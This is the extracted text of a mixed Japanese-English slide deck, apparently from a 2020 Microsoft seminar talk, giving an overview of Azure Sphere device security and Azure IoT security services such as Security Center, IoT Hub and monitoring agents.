Microsot Azure IoT Security for IoT ALGYAN Tech Seminar 2020/2/6
1. Azure Sphere のセキュリティ
• Microsoft Corporation
• Global Black Belt IoT Technical Specialist
• 太田 寛
• Twitter: @embedded_george
2. A long history of trustworthy computing
• Microsoft has more than 25 years experience protecting customers and their devices.
Trustworthy
Computing
Initiative
Security
Development
Lifecycle
Malware
Protection
Center
Microsoft
Security
Response
Center
First
Microsoft
Datacenter Digital
Crimes
Unit
Operations
Security
Assurance
The first
documented
ransomware
attack
First internet
virus spreads
malicious
Kaos code
First AOL
Trojan
appears
Introduction
of phrase:
The Internet of
Things
DoS attacks shut
down Yahoo!,
Buy.com, Amazon,
eBay and CNN.
Cabir, the first
mobile device
worm, is
developed
The first
reported
ransomware
attack occurs
on connected
devices
Azure Sphere
launched
1989 1994 1998 2004 2007 2014 20171995 1999 2005 2018
5. The 7 properties of highly secured devices
https://aka.ms/7properties
6. Azure Sphere
Certified MCUs
The Azure Sphere
Operating System
The Azure Sphere
Security Service
Azure Sphere is an end-to-end solution for securing MCU
powered devices
7. Azure Sphere Certified MCUs
from silicon partners, with built-in Microsoft
security technology provide connectivity and a
dependable hardware root of trust.
MCU – ハードウェアによる
8.
9. The Azure Sphere Operating System
a four-layer defense in depth OS with ongoing
updates creates a secured platform for IoT
experiences.
OS – ソフトウェアによる
10.
11. The Azure Sphere Security Service
guards every Azure Sphere device; it brokers trust for
device-to-device and device-to-cloud communication,
detects emerging threats, and renews device
security.
クラウド – サービスによる
14. Increasing
complexity
Evolving
threats
Talent gap
Rising costs
By 2021, 25% of the
world's personal data will
be compromised and
housed in a Data Lake
analyzed and utilized by
consortiums of Threat
Actors*
!
On-premises Cloud
The security
landscape
*Source: IDC FutureScape: Worldwide Security Products and Services
15. Built-in controls
Unmatched security across
operations, technology,
and partnerships
• $1B annual investment
in cybersecurity
• 3500+ global security
experts
• Trillions of diverse signals
for unique intelligence
Secure foundation and intelligence
For a heterogeneous world
16. Get secure faster
Azure Security Center
Strengthen security posture
Cloud security posture management
Secure Score
Policies and compliance
Protect against threats
For
servers
For cloud native
workloads
For
databases
and storage
18. IoT Solution - End-to-end Threat Analysis(脅威分析)
Communication
Internet
Remote /
Physical
Access
Device
Access Execution
Edge
Access Execution
Access ControlBehavior
Telemetry
Configuration
Device
Admin
Admin
C&C
(Twin)
Custom
Endpoints
IoT Hub World
ASC Based Protection
Azure
Prebuilt
Secure
Secure
19.
20. IoT の真の、“エンドツーエンド”なセキュリティ
End-to-end solution
– from device, to
Edge to IoT hub
Visibility into security
posture and state of
the Azure IoT
Solution
Single pane of glass
to manage IoT and
hybrid cloud security
infrastructure
End-to-end analysis
and management of
security posture
Find, investigate,
and respond to the
real threats in
minutes without the
fatigue of false
positives with
Azure Sentinel
Find and eliminate
threats and manage
your security posture
with Azure Security
Center
Monitor the health of
your IoT devices in
near real time with
Azure IoT Hub
Block compromised
devices with Azure
IoT Hub
21. デバイス セキュリティ モニタリング エージェント
Security agents provide in depth device monitoring and visibility
Reference architecture for Linux and Windows security agents
for IoT devices, both in C# and C
These agents handle raw event collection from the OS, event
aggregation to reduce cost & configuration through device
Security Twin
Security messages are sent through the customer’s IoT hub, into
ASC for IoT analytics services
Open Source
22. Securing IoT Edge Devices
Containerized Edge Agent –
deployable automatically on the
targeted devices
MMA and Edge Hub – baselining and
detection
Customized Recommendations
and Alerts
IoT Edge-based Security
Security Container running ASC for IoT
analytics
Azure IoT Edge
OPC UA
module
Edge Hub3rd party
module
ASA
module
Functions
module
ASC Edge
module
Module
Management
Azure Service
(ASA, functions)
Customer
Application
Device* Device†
Azure Cloud
loT Hub
API
loT Hub
API
loT Hub API
Store & forward
loT Hub APIModule communicationOPC UA
loT Edge Runtime
* Devices requiring module for protocol
† Devices capable of using loT Hub SDK
Module twindata
config
control
loTHub
DCS
Twin
Edge
Agent
iotedged
Docker
Engine
Azure loT Edge